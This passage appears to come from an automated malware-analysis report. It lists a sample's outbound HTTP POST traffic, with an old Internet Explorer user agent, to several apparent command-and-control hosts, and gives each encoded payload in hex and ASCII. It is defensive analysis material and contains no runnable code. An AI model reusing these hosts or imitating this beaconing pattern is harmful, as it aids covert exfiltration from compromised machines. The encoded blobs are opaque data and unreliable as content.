31 71 4b 46 47 74 6a 75 76 48 4d 61 34 34 78 78 31 63 32 57 4d 42 59 36 36 55 69 38 31 74 6d 53 73 34 4e 52 38 67 78 6c 47 6a 4b 4b 64 35 79 31 73 2b 39 7a 38 69 48 71 75 79 4c 42 74 4f 4f 2f 6c 72 37 6c 71 75 79 36 6e 31 73 51 70 72 71 58 44 78 2f 66 32 79 Data Ascii: hd8cPQs3hIahHsgXYiAnH3RxyJ9RBgp+b8m6kKgzAduasPAX7rlUhUQqE4ayXZH3vHaM6UXog/lmeOsE78v2SB+EpuryL7uvi/SpQ0jiA2twTVoRbTFPXr5c47iEZidwdhk7WhSGoVCKACu4ubXSxgn8+x1LGvurDxeziPpVX9gcUU2dK5O1NojIBh3o4Fwyea6IS5YWjMK4YjN83Ls2w4l5cCRD+6i6zo1AQeU6RyK+XZ/mU6lTNC4SWUxwnvhLDixE9QfUnabQWNp9E6z5n9fnTYwl12lm3EYbXx8GIBSXA/QySWB2NdUH6SB5ghR0qHdgYEZXmEARSE8jTlGRflK3fgAgm9UBtwTm060cCgJfj39VcGVv/TagZKLh37LUP0ogM9Qaj6z2Goq99FgtoiHwFjZihBLg09qxD7HRP/UDfPoCracNqQ/2uKADrGlO/q+Ua9GK6qMPXeWQqbqRJrn6lKcJWjWSvJ9ofs1qKFGtjuvHMa44xx1c2WMBY66Ui81tmSs4NR8gxlGjKKd5y1s+9z8iHquyLBtOO/lr7lquy6n1sQprqXDx/f2y
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 32 6d 61 5a 39 79 2f 31 67 59 61 62 78 75 79 48 54 69 42 51 79 6a 6a 72 66 36 4a 46 36 57 73 36 30 7a 38 4a 71 54 51 6a 62 63 62 45 65 76 58 77 63 68 4a 39 31 6a 79 69 73 78 31 36 50 68 67 4f 69 6e 64 4c 52 2b 62 49 5a 69 49 32 31 47 78 56 77 47 4e 50 70 6c 6b 71 51 5a 56 4c 46 6d 45 38 73 6d 4c 4d 4b 56 78 4e 54 54 79 49 55 52 31 41 6b 72 70 6b 6d 4d 41 62 79 53 78 51 32 4f 61 34 4a 50 50 48 6b 72 4b 37 6c 47 6f 68 4b 43 57 6f 6a 6a 71 4a 77 5a 6d 70 47 31 48 42 4d 62 6b 73 4b 42 62 47 4b 47 2f 50 67 2f 45 55 6a 62 45 74 59 4e 4d 50 58 51 55 2f 7a 36 75 69 33 75 75 4a 6b 36 72 34 73 38 43 4f 33 53 6f 32 59 59 39 73 67 55 59 5a 6f 55 68 71 4a 4a 4d 47 68 31 54 49 6d 4d 47 38 67 70 74 49 55 58 72 6c 72 39 6d 53 54 52 69 50 64 72 35 57 4e 65 72 31 59 37 79 56 5a 33 38 6b 57 67 39 53 52 2f 43 6a 67 63 67 69 70 52 5a 6e 34 77 55 72 6f 54 31 31 45 4e 66 57 70 51 43 55 48 38 30 66 56 46 71 67 73 44 72 51 52 4d 45 37 61 42 61 4c 51 6f 50 66 61 56 67 5a 4c 61 64 6f 56 49 74 59 62 49 6f 64 4f 6c 30 70 79 56 6e 4e 44 47 77 46 65 68 57 47 70 2f 35 2f 71 75 6b 74 53 43 4d 48 7a 77 63 53 79 32 68 61 4e 59 67 4e 61 57 64 68 65 79 6a 61 42 39 7a 39 57 76 33 71 72 74 38 6b 31 74 44 44 46 64 2b 56 65 6f 4f 75 53 47 65 4c 4f 79 32 49 53 59 36 56 43 48 41 46 79 6f 38 59 36 6d 56 4b 33 43 71 6a 6a 36 78 4a 75 4a 50 52 58 48 76 31 39 78 61 38 71 32 4b 70 5a 7a 7a 32 6e 78 64 75 65 5a 72 50 71 37 44 75 4e 34 73 33 71 2f 41 46 71 4d 71 65 5a 67 46 51 54 6e 64 4a 68 65 71 36 51 68 49 78 4e 69 6d 6a 79 35 69 4e 32 78 47 45 6f 74 50 4c 34 6e 77 6c 47 35 47 5a 46 48 6b 52 49 2f 4b 33 46 61 30 78 59 30 69 4c 58 30 52 4f Data Ascii: 2maZ9y/1gYabxuyHTiBQyjjrf6JF6Ws60z8JqTQjbcbEevXwchJ91jyisx16PhgOindLR+bIZiI21GxVwGNPplkqQZVLFmE8smLMKVxNTTyIUR1AkrpkmMAbySxQ2Oa4JPPHkrK7lGohKCWojjqJwZmpG1HBMbksKBbGKG/Pg/EUjbEtYNMPXQU/z6ui3uuJk6r4s8CO3So2YY9sgUYZoUhqJJMGh1TImMG8gptIUXrlr9mSTRiPdr5WNer1Y7yVZ38kWg9SR/CjgcgipRZn4wUroT11ENfWpQCUH80fVFqgsDrQRME7aBaLQoPfaVgZLadoVItYbIodOl0pyVnNDGwFehWGp/5/quktSCMHzwcSy2haNYgNaWdheyjaB9z9Wv3qrt8k1tDDFd+VeoOuSGeLOy2ISY6VCHAFyo8Y6mVK3Cqjj6xJuJPRXHv19xa8q2KpZzz2nxdueZrPq7DuN4s3q/AFqMqeZgFQTndJheq6QhIxNimjy5iN2xGEotPL4nwlG5GZFHkRI/K3Fa0xY0iLX0RO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pr-park.comCache-Control: no-cacheData Raw: 45 6a 4a 65 49 4a 32 6e 63 6f 59 53 48 4a 42 47 31 41 52 66 48 64 59 35 6c 51 4a 4c 7a 39 6d 72 49 55 70 64 42 53 46 7a 67 6e 38 54 44 47 55 6d 4d 47 46 52 70 79 74 49 6b 58 47 39 64 39 78 54 53 54 77 42 63 77 4a 70 41 71 43 30 39 54 79 4e 39 44 51 47 4a 2f 53 59 5a 2b 70 61 71 4c 65 38 6b 50 4b 51 6b 69 59 71 41 49 4e 35 52 32 6c 73 6f 46 42 72 78 4b 6a 77 77 61 2b 4b 79 46 73 39 55 32 30 6d 33 75 7a 71 71 67 33 57 57 66 64 6d 32 38 6d 44 68 55 50 46 49 75 5a 41 4e 69 42 63 34 61 34 39 6d 49 4d 32 70 68 4c 45 35 57 45 4e 6f 6a 2f 75 45 4d 54 46 50 6b 76 45 5a 6c 69 51 6c 7a 63 7a 66 42 61 68 64 74 75 31 73 38 57 30 69 42 6b 51 48 57 32 38 33 55 32 74 71 34 66 62 5a 72 61 35 69 6f 37 74 53 2b 34 68 45 6b 74 67 52 57 53 79 57 75 56 4b 48 38 56 4d 4e 32 31 6b 39 36 51 77 4d 77 52 65 4e 31 77 42 75 65 6f 77 4b 35 56 51 75 2f 32 6e 35 69 32 4d 6e 76 37 4b 53 77 32 65 43 33 6e 57 62 62 43 30 37 54 4b 6c 67 51 53 65 68 41 44 37 4b 52 5a 72 79 64 6b 79 46 4c 68 4e 53 53 31 4d 35 72 2b 32 39 79 41 62 59 2f 55 34 35 50 31 2f 76 65 73 4a 74 34 35 68 75 6b 58 45 45 77 33 6a 64 71 34 52 75 53 64 37 62 4c 56 73 64 35 6d 30 34 77 6f 4a 71 48 52 65 4c 33 32 68 69 4a 51 68 62 38 41 32 4f 54 68 4c 5a 4f 62 47 34 66 68 63 72 45 53 79 6e 33 45 35 34 32 4c 64 49 78 76 6b 50 53 39 38 46 53 76 41 39 77 55 72 31 4a 42 7a 76 6b 51 35 36 34 72 74 62 55 45 54 49 79 58 71 58 47 50 30 37 4f 42 54 6f 6f 38 74 2b 39 77 73 2f 6c 46 35 70 4e 6c 50 64 65 34 48 66 58 67 58 4c 59 6d 6f 35 2b 79 31 50 44 41 6e 54 7a 6c 55 6b 57 66 67 64 57 59 39 37 46 50 43 47 78 78 38 54 6c 73 77 51 65 78 74 6b 49 4f 79 78 75 6b 37 4e 77 79 37 75 61 59 65 43 65 54 59 78 4a 77 34 49 7a 56 62 4e 36 41 2b 71 38 66 79 49 38 2f 30 50 39 37 67 57 61 57 34 4a 4b 30 3d Data Ascii: EjJeIJ2ncoYSHJBG1ARfHdY5lQJLz9mrIUpdBSFzgn8TDGUmMGFRpytIkXG9d9xTSTwBcwJpAqC09TyN9DQGJ/SYZ+paqLe8kPKQkiYqAIN5R2lsoFBrxKjwwa+KyFs9U20m3uzqqg3WWfdm28mDhUPFIuZANiBc4a49mIM2phLE5WENoj/uEMTFPkvEZliQlzczfBahdtu1s8W0iBkQHW283U2tq4fbZra5io7tS+4hEktgRWSyWuVKH8VMN21k96QwMwReN1wBueowK5VQu/2n5i2Mnv7KSw2eC3nWbbC07TKlgQSehAD7KRZrydkyFLhNSS1M5r+29yAbY/U45P1/vesJt45hukXEEw3jdq4RuSd7bLVsd5m04woJqHReL32hiJQhb8A2OThLZObG4fhcrESyn3E542LdIxvkPS98FSvA9wUr1JBzvkQ564rtbUETIyXqXGP07OBToo8t+9ws/lF5pNlPde4HfXgXLYmo5+y1PDAnTzlUkWfgdWY97FPCGxx8TlswQextkIOyxuk7Nwy7uaYeCeTYxJw4IzVbN6A+q8fyI8/0P97gWaW4JK0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 4c 72 71 37 66 79 57 78 6a 6f 5a 43 45 4b 68 53 7a 4c 44 66 4f 4a 35 6b 52 48 5a 7a 36 31 4b 45 4b 61 67 68 71 37 78 45 6c 50 47 49 70 43 53 52 59 67 5a 72 7a 38 47 5a 34 30 31 56 6d 79 4c 6e 4f 76 57 56 34 46 61 34 37 49 41 61 36 59 2b 4d 78 33 54 71 2f 32 30 59 6a 2f 79 79 7a 6b 63 36 53 68 58 61 53 38 32 75 31 46 54 4d 62 53 4c 6e 7a 72 41 6c 74 33 76 46 59 78 6e 6d 6e 57 72 54 42 63 65 4d 7a 41 69 57 63 30 6f 6a 78 76 54 53 68 4f 65 32 44 78 73 58 36 78 36 73 76 68 6a 30 44 39 57 78 6b 70 5a 5a 4e 30 30 68 79 54 4f 56 7a 59 71 79 33 66 4e 6f 79 56 6d 65 46 69 59 4b 46 46 32 4b 35 70 47 45 34 32 4f 4e 59 31 53 32 69 6e 76 68 59 75 4a 72 7a 50 67 76 55 72 5a 46 45 6b 49 47 65 46 36 4c 6c 4e 43 50 52 51 5a 57 67 56 5a 69 67 51 48 45 53 2b 39 5a 45 55 58 4c 36 41 68 58 4b 39 53 49 64 4c 33 59 59 2b 50 6d 39 35 32 30 74 39 79 71 59 32 33 54 39 36 56 30 72 79 57 61 56 6f 35 51 2f 6f 49 31 78 71 46 4c 66 42 47 52 67 35 32 59 36 53 4d 74 59 74 4b 38 34 6d 33 63 79 30 2f 44 37 47 30 50 72 65 69 33 70 52 54 6f 6e 5a 58 39 67 4e 30 73 71 46 52 52 55 6d 64 35 39 30 66 66 53 56 76 53 6c 65 33 59 51 35 59 6f 77 57 58 41 6b 53 6d 61 62 65 6d 63 75 67 46 78 49 32 50 4e 34 53 63 6a 4f 30 59 63 62 32 39 6c 61 78 6e 58 34 69 38 39 4d 6d 45 7a 7a 78 57 5a 4a 4d 46 39 35 2b 6e 33 46 34 39 7a 39 63 4f 31 49 63 37 46 53 46 73 36 79 76 42 43 34 53 62 78 36 78 58 6b 6e 38 51 41 31 4c 4d 5a 69 42 46 72 35 2f 2f 66 73 70 67 76 77 74 55 69 4e 69 34 74 6c 35 73 79 34 6f 6b 64 34 6e 79 51 4e 53 54 47 2b 41 31 51 4a 51 6e 34 58 54 43 6e 56 76 53 49 7a 4f 6f 67 4e 49 4c 6d 2f 63 30 30 41 34 45 6a 62 34 73 44 69 49 79 2f 63 61 4a 76 67 4d 63 67 74 6d 56 4f 36 35 57 53 6c 6a 46 4f 62 79 37 69 5a 55 50 42 7a 61 59 63 6e 77 3d 3d Data Ascii: Lrq7fyWxjoZCEKhSzLDfOJ5kRHZz61KEKaghq7xElPGIpCSRYgZrz8GZ401VmyLnOvWV4Fa47IAa6Y+Mx3Tq/20Yj/yyzkc6ShXaS82u1FTMbSLnzrAlt3vFYxnmnWrTBceMzAiWc0ojxvTShOe2DxsX6x6svhj0D9WxkpZZN00hyTOVzYqy3fNoyVmeFiYKFF2K5pGE42ONY1S2invhYuJrzPgvUrZFEkIGeF6LlNCPRQZWgVZigQHES+9ZEUXL6AhXK9SIdL3YY+Pm9520t9yqY23T96V0ryWaVo5Q/oI1xqFLfBGRg52Y6SMtYtK84m3cy0/D7G0Prei3pRTonZX9gN0sqFRRUmd590ffSVvSle3YQ5YowWXAkSmabemcugFxI2PN4ScjO0Ycb29laxnX4i89MmEzzxWZJMF95+n3F49z9cO1Ic7FSFs6yvBC4Sbx6xXkn8QA1LMZiBFr5//fspgvwtUiNi4tl5sy4okd4nyQNSTG+A1QJQn4XTCnVvSIzOogNILm/c00A4Ejb4sDiIy/caJvgMcgtmVO65WSljFOby7iZUPBzaYcnw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 43 75 54 58 33 45 56 32 63 49 62 69 79 30 32 77 62 48 49 42 62 4c 34 4b 4a 34 51 54 46 34 31 61 53 54 63 42 6e 30 42 6e 54 61 49 61 5a 39 49 78 62 44 2f 6a 2f 39 78 70 2f 43 35 6d 68 6f 6d 69 57 2b 2f 39 36 32 54 39 4f 46 55 4b 73 73 4b 6f 30 62 51 57 33 6f 77 32 43 64 46 32 73 32 37 58 6f 6f 62 42 4d 44 44 6e 64 61 6f 67 49 4a 49 74 71 45 4d 4a 4c 4f 74 65 44 50 6a 33 6e 54 39 64 34 45 4c 58 64 46 6b 77 32 78 69 79 37 50 6b 78 42 76 30 45 71 5a 57 55 79 57 52 32 79 6c 45 76 4d 41 4b 4a 4d 55 4d 70 73 76 6a 4b 66 76 54 78 6c 56 33 62 61 5a 6e 71 35 6f 4f 65 6d 79 54 76 31 32 48 71 4c 67 68 52 6f 35 5a 58 79 47 67 51 33 4b 61 79 74 6b 47 74 66 67 4f 45 64 54 44 36 59 4e 45 6c 76 47 4e 44 74 74 4a 4c 41 54 50 4b 4d 57 30 6a 6f 6d 52 32 6f 5a 2b 59 7a 58 56 58 6c 70 69 77 56 55 76 64 4f 5a 4b 66 42 42 70 51 38 59 7a 49 67 2b 55 33 45 73 4b 48 6f 39 4f 2f 46 71 6d 36 41 4f 34 37 4c 79 50 42 74 6c 74 4a 5a 7a 65 6b 74 71 50 35 69 65 4f 49 4b 6b 45 6c 4e 63 62 46 75 36 67 73 67 2f 46 4c 43 39 65 59 44 48 44 34 4b 70 6f 38 6f 46 75 6b 4b 4a 61 33 68 72 58 37 6a 49 73 54 4f 39 49 4e 34 41 32 38 71 67 6a 2b 6e 43 2f 6c 39 52 74 79 44 72 7a 42 39 5a 39 6a 4c 4b 64 69 35 2b 54 57 39 30 44 68 72 77 45 75 4e 6a 6c 34 76 61 59 32 72 33 58 5a 2f 44 76 62 73 50 39 62 58 73 35 65 4b 39 38 46 54 32 42 38 79 52 48 6a 70 6c 78 70 64 49 79 75 7a 4a 50 57 2f 4d 30 67 52 38 50 41 64 49 70 70 55 30 41 4c 63 46 30 52 71 73 2f 41 49 5a 39 4f 67 74 57 39 73 56 51 32 44 36 70 73 44 78 32 2b 4c 48 75 46 7a 50 34 50 52 39 43 73 51 57 61 67 61 38 65 6b 49 75 43 51 74 64 2b 47 4a 4e 79 36 79 67 6d 65 69 4a 61 53 75 46 71 47 4d 6a 4a 31 55 32 44 2b 6e 30 67 4c 2f 35 4a 6e 48 49 44 71 48 30 48 58 78 43 49 50 78 5a 36 33 76 4f 38 69 63 52 4b 41 33 5a 68 52 6c 57 68 6c Data Ascii: CuTX3EV2cIbiy02wbHIBbL4KJ4QTF41aSTcBn0BnTaIaZ9IxbD/j/9xp/C5mhomiW+/962T9OFUKssKo0bQW3ow2CdF2s27XoobBMDDndaogIJItqEMJLOteDPj3nT9d4ELXdFkw2xiy7PkxBv0EqZWUyWR2ylEvMAKJMUMpsvjKfvTxlV3baZnq5oOemyTv12HqLghRo5ZXyGgQ3KaytkGtfgOEdTD6YNElvGNDttJLATPKMW0jomR2oZ+YzXVXlpiwVUvdOZKfBBpQ8YzIg+U3EsKHo9O/Fqm6AO47LyPBtltJZzektqP5ieOIKkElNcbFu6gsg/FLC9eYDHD4Kpo8oFukKJa3hrX7jIsTO9IN4A28qgj+nC/l9RtyDrzB9Z9jLKdi5+TW90DhrwEuNjl4vaY2r3XZ/DvbsP9bXs5eK98FT2B8yRHjplxpdIyuzJPW/M0gR8PAdIppU0ALcF0Rqs/AIZ9OgtW9sVQ2D6psDx2+LHuFzP4PR9CsQWaga8ekIuCQtd+GJNy6ygmeiJaSuFqGMjJ1U2D+n0gL/5JnHIDqH0HXxCIPxZ63vO8icRKA3ZhRlWhl
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 43 70 47 75 45 54 30 65 69 34 59 62 39 2f 6a 65 39 4d 71 41 63 33 59 4a 58 54 42 72 6d 6c 6a 69 77 64 72 6a 31 77 61 4a 6d 4a 46 45 4e 54 56 78 51 58 4e 77 4d 56 34 65 4a 2b 33 5a 50 73 44 79 72 37 38 38 66 4c 64 47 5a 55 58 4a 7a 79 64 52 77 6a 78 55 4a 44 5a 4c 4c 72 75 2f 4c 4d 4a 46 4f 55 56 2f 7a 47 79 6f 63 39 78 54 53 6d 65 38 50 69 75 65 4c 56 42 4a 4a 53 70 79 52 4e 7a 31 64 42 2b 74 72 4f 72 4f 36 4a 6d 57 66 4f 69 43 35 61 47 52 44 72 2f 5a 37 73 30 77 64 46 75 59 2f 31 65 33 75 76 70 7a 6f 6d 68 6f 6c 49 4b 39 78 4d 33 53 34 70 46 6c 62 70 4f 39 4d 76 33 64 56 33 73 78 30 42 32 76 4f 69 50 50 58 6f 6e 79 47 36 70 54 39 6a 6e 66 6a 35 57 2f 6c 4a 39 6e 6e 71 49 50 35 71 48 34 70 64 48 6a 73 75 37 76 54 74 64 44 6d 42 7a 33 76 46 63 4a 46 4c 38 73 62 51 57 78 34 6a 31 6d 49 7a 31 4b 74 51 4b 52 47 41 66 64 44 75 50 78 4c 64 5a 34 56 68 63 46 4f 75 6f 30 51 71 51 45 77 55 54 50 62 6f 62 51 4b 72 2f 62 67 35 30 68 4d 50 4d 48 43 59 39 6c 34 57 48 62 5a 39 32 59 36 4e 41 44 67 66 51 30 41 4d 46 69 54 38 35 31 39 67 74 51 6d 39 42 4d 58 74 75 6c 65 76 6c 4e 57 43 4b 6c 35 4f 77 2b 52 4d 6e 66 36 55 58 4d 35 63 65 47 64 6e 51 52 48 76 49 34 49 32 66 6d 55 49 32 43 64 4e 41 4e 31 4e 56 50 2b 50 51 31 36 56 66 67 37 6f 36 37 53 5a 48 4c 43 45 4c 75 33 71 6a 42 43 55 7a 4f 41 57 38 61 74 6b 4e 67 32 32 52 72 75 64 78 6e 44 31 43 38 72 68 68 49 69 30 35 67 67 45 64 76 66 6a 32 63 69 6b 55 33 5a 4a 54 4b 57 37 46 6e 48 39 36 64 42 76 37 32 39 39 5a 78 59 45 31 42 4c 69 56 68 50 5a 2f 54 2f 6a 34 38 6c 58 68 70 2f 53 77 43 4b 35 35 48 76 68 6a 46 4c 5a 53 52 4d 44 50 53 31 63 53 33 57 69 6b 39 53 38 62 72 7a 6b 70 47 77 61 68 78 44 77 65 57 79 71 50 52 52 4b 73 44 75 6d 76 4f 4f 32 74 52 70 2b 67 4d 72 6b 75 64 6b 42 73 32 77 51 7a 4f 31 4e 6d 56 66 4f 73 63 44 74 58 77 71 4f 51 3d Data Ascii: CpGuET0ei4Yb9/je9MqAc3YJXTBrmljiwdrj1waJmJFENTVxQXNwMV4eJ+3ZPsDyr788fLdGZUXJzydRwjxUJDZLLru/LMJFOUV/zGyoc9xTSme8PiueLVBJJSpyRNz1dB+trOrO6JmWfOiC5aGRDr/Z7s0wdFuY/1e3uvpzomholIK9xM3S4pFlbpO9Mv3dV3sx0B2vOiPPXonyG6pT9jnfj5W/lJ9nnqIP5qH4pdHjsu7vTtdDmBz3vFcJFL8sbQWx4j1mIz1KtQKRGAfdDuPxLdZ4VhcFOuo0QqQEwUTPbobQKr/bg50hMPMHCY9l4WHbZ92Y6NADgfQ0AMFiT8519gtQm9BMXtulevlNWCKl5Ow+RMnf6UXM5ceGdnQRHvI4I2fmUI2CdNAN1NVP+PQ16Vfg7o67SZHLCELu3qjBCUzOAW8atkNg22RrudxnD1C8rhhIi05ggEdvfj2cikU3ZJTKW7FnH96dBv7299ZxYE1BLiVhPZ/T/j48lXhp/SwCK55HvhjFLZSRMDPS1cS3Wik9S8brzkpGwahxDweWyqPRRKsDumvOO2tRp+gMrkudkBs2wQzO1NmVfOscDtXwqOQ=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 46 6b 4b 49 6a 65 55 6a 6a 34 59 53 71 47 46 72 6a 41 52 65 6d 31 34 6c 7a 66 6b 7a 70 64 43 42 36 65 36 74 44 33 6c 45 4d 30 64 62 44 57 36 50 41 62 2f 4d 61 6b 34 67 52 38 6f 44 4f 71 76 43 4d 33 69 30 54 69 7a 53 67 44 48 4a 54 55 48 67 37 53 63 61 33 79 73 73 61 72 52 67 34 4b 32 57 62 67 4f 41 41 38 52 43 72 47 6e 4c 52 65 41 56 4f 68 64 6d 47 49 34 45 74 41 78 43 4d 6c 58 52 74 66 47 53 6b 65 6a 65 69 79 32 65 46 4a 5a 43 79 32 30 55 47 55 6b 52 4c 2b 75 6f 62 33 31 51 68 48 32 77 31 32 69 70 51 37 62 35 61 4a 2b 6b 70 43 30 6d 6d 41 79 55 79 4d 47 33 61 34 49 6e 44 51 56 78 4f 4e 6f 79 4e 4b 38 61 41 59 6e 6c 44 51 2f 71 76 30 6e 66 78 33 46 69 66 43 47 69 46 7a 73 47 43 77 51 35 6d 37 4a 46 6a 2f 35 79 42 41 38 59 36 52 2f 39 44 6c 49 75 61 51 41 41 46 61 6c 2f 62 46 48 2f 41 32 4c 6d 74 74 62 38 43 65 39 57 43 69 50 6c 62 6d 71 59 33 37 68 67 50 5a 70 62 32 44 49 47 44 48 5a 32 4a 77 42 39 53 7a 55 46 59 4b 4e 4e 42 70 6e 67 72 6c 33 70 34 32 4b 34 6b 6d 4f 78 59 37 31 74 47 68 65 2f 62 6d 50 35 6b 30 30 51 4a 5a 43 4b 43 70 2f 73 48 78 48 67 6a 71 7a 53 37 68 73 78 34 45 4f 34 67 47 47 38 56 44 49 57 56 31 61 62 66 63 33 5a 55 4a 44 59 79 66 7a 5a 61 6a 55 6d 48 7a 54 52 59 65 57 75 34 50 49 5a 74 6f 32 50 6e 39 30 73 51 53 7a 74 37 6a 4e 48 6b 6c 31 6a 72 57 6e 41 4e 31 6d 55 36 62 39 6e 4e 44 74 69 53 71 54 50 6e 4a 73 71 58 31 39 41 68 33 64 55 66 36 47 42 6e 78 30 7a 4b 53 43 65 36 4e 2b 49 33 6b 46 49 77 65 41 4c 4f 73 59 72 55 63 69 7a 62 4b 56 52 48 33 68 7a 79 50 6f 66 6a 2f 75 79 54 43 68 30 62 4e 6c 4e 7a 6f 73 5a 74 33 50 39 79 30 42 58 63 50 30 4b 71 6c 45 2f 6c 76 76 59 61 79 57 30 48 4b 57 34 39 74 48 34 50 69 48 2f 51 30 59 64 34 52 6e 46 Data Ascii: FkKIjeUjj4YSqGFrjARem14lzfkzpdCB6e6tD3lEM0dbDW6PAb/Mak4gR8oDOqvCM3i0TizSgDHJTUHg7Sca3yssarRg4K2WbgOAA8RCrGnLReAVOhdmGI4EtAxCMlXRtfGSkejeiy2eFJZCy20UGUkRL+uob31QhH2w12ipQ7b5aJ+kpC0mmAyUyMG3a4InDQVxONoyNK8aAYnlDQ/qv0nfx3FifCGiFzsGCwQ5m7JFj/5yBA8Y6R/9DlIuaQAAFal/bFH/A2Lmttb8Ce9WCiPlbmqY37hgPZpb2DIGDHZ2JwB9SzUFYKNNBpngrl3p42K4kmOxY71tGhe/bmP5k00QJZCKCp/sHxHgjqzS7hsx4EO4gGG8VDIWV1abfc3ZUJDYyfzZajUmHzTRYeWu4PIZto2Pn90sQSzt7jNHkl1jrWnAN1mU6b9nNDtiSqTPnJsqX19Ah3dUf6GBnx0zKSCe6N+I3kFIweALOsYrUcizbKVRH3hzyPofj/uyTCh0bNlNzosZt3P9y0BXcP0KqlE/lvvYayW0HKW49tH4PiH/Q0Yd4RnF
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 46 6b 4b 49 6a 65 55 6a 6a 34 59 53 71 47 46 72 6a 41 52 65 6d 31 34 6c 7a 66 6b 7a 70 64 43 42 36 65 36 74 44 33 6c 45 4d 30 64 62 44 57 36 50 41 62 2f 4d 61 6b 34 67 52 38 6f 44 4f 71 76 43 4d 33 69 30 54 69 7a 53 67 44 48 4a 54 55 48 67 37 53 63 61 33 79 73 73 61 72 52 67 34 4b 32 57 62 67 4f 41 41 38 52 43 72 47 6e 4c 52 65 41 56 4f 68 64 6d 47 49 34 45 74 41 78 43 4d 6c 58 52 74 66 47 53 6b 65 6a 65 69 79 32 65 46 4a 5a 43 79 32 30 55 47 55 6b 52 4c 2b 75 6f 62 33 31 51 68 48 32 77 31 32 69 70 51 37 62 35 61 4a 2b 6b 70 43 30 6d 6d 41 79 55 79 4d 47 33 61 34 49 6e 44 51 56 78 4f 4e 6f 79 4e 4b 38 61 41 59 6e 6c 44 51 2f 71 76 30 6e 66 78 33 46 69 66 43 47 69 46 7a 73 47 43 77 51 35 6d 37 4a 46 6a 2f 35 79 42 41 38 59 36 52 2f 39 44 6c 49 75 61 51 41 41 46 61 6c 2f 62 46 48 2f 41 32 4c 6d 74 74 62 38 43 65 39 57 43 69 50 6c 62 6d 71 59 33 37 68 67 50 5a 70 62 32 44 49 47 44 48 5a 32 4a 77 42 39 53 7a 55 46 59 4b 4e 4e 42 70 6e 67 72 6c 33 70 34 32 4b 34 6b 6d 4f 78 59 37 31 74 47 68 65 2f 62 6d 50 35 6b 30 30 51 4a 5a 43 4b 43 70 2f 73 48 78 48 67 6a 71 7a 53 37 68 73 78 34 45 4f 34 67 47 47 38 56 44 49 57 56 31 61 62 66 63 33 5a 55 4a 44 59 79 66 7a 5a 61 6a 55 6d 48 7a 54 52 59 65 57 75 34 50 49 5a 74 6f 32 50 6e 39 30 73 51 53 7a 74 37 6a 4e 48 6b 6c 31 6a 72 57 6e 41 4e 31 6d 55 36 62 39 6e 4e 44 74 69 53 71 54 50 6e 4a 73 71 58 31 39 41 68 33 64 55 66 36 47 42 6e 78 30 7a 4b 53 43 65 36 4e 2b 49 33 6b 46 49 77 65 41 4c 4f 73 59 72 55 63 69 7a 62 4b 56 52 48 33 68 7a 79 50 6f 66 6a 2f 75 79 54 43 68 30 62 4e 6c 4e 7a 6f 73 5a 74 33 50 39 79 30 42 58 63 50 30 4b 71 6c 45 2f 6c 76 76 59 61 79 57 30 48 4b 57 34 39 74 48 34 50 69 48 2f 51 30 59 64 34 52 6e 46 Data Ascii: FkKIjeUjj4YSqGFrjARem14lzfkzpdCB6e6tD3lEM0dbDW6PAb/Mak4gR8oDOqvCM3i0TizSgDHJTUHg7Sca3yssarRg4K2WbgOAA8RCrGnLReAVOhdmGI4EtAxCMlXRtfGSkejeiy2eFJZCy20UGUkRL+uob31QhH2w12ipQ7b5aJ+kpC0mmAyUyMG3a4InDQVxONoyNK8aAYnlDQ/qv0nfx3FifCGiFzsGCwQ5m7JFj/5yBA8Y6R/9DlIuaQAAFal/bFH/A2Lmttb8Ce9WCiPlbmqY37hgPZpb2DIGDHZ2JwB9SzUFYKNNBpngrl3p42K4kmOxY71tGhe/bmP5k00QJZCKCp/sHxHgjqzS7hsx4EO4gGG8VDIWV1abfc3ZUJDYyfzZajUmHzTRYeWu4PIZto2Pn90sQSzt7jNHkl1jrWnAN1mU6b9nNDtiSqTPnJsqX19Ah3dUf6GBnx0zKSCe6N+I3kFIweALOsYrUcizbKVRH3hzyPofj/uyTCh0bNlNzosZt3P9y0BXcP0KqlE/lvvYayW0HKW49tH4PiH/Q0Yd4RnF
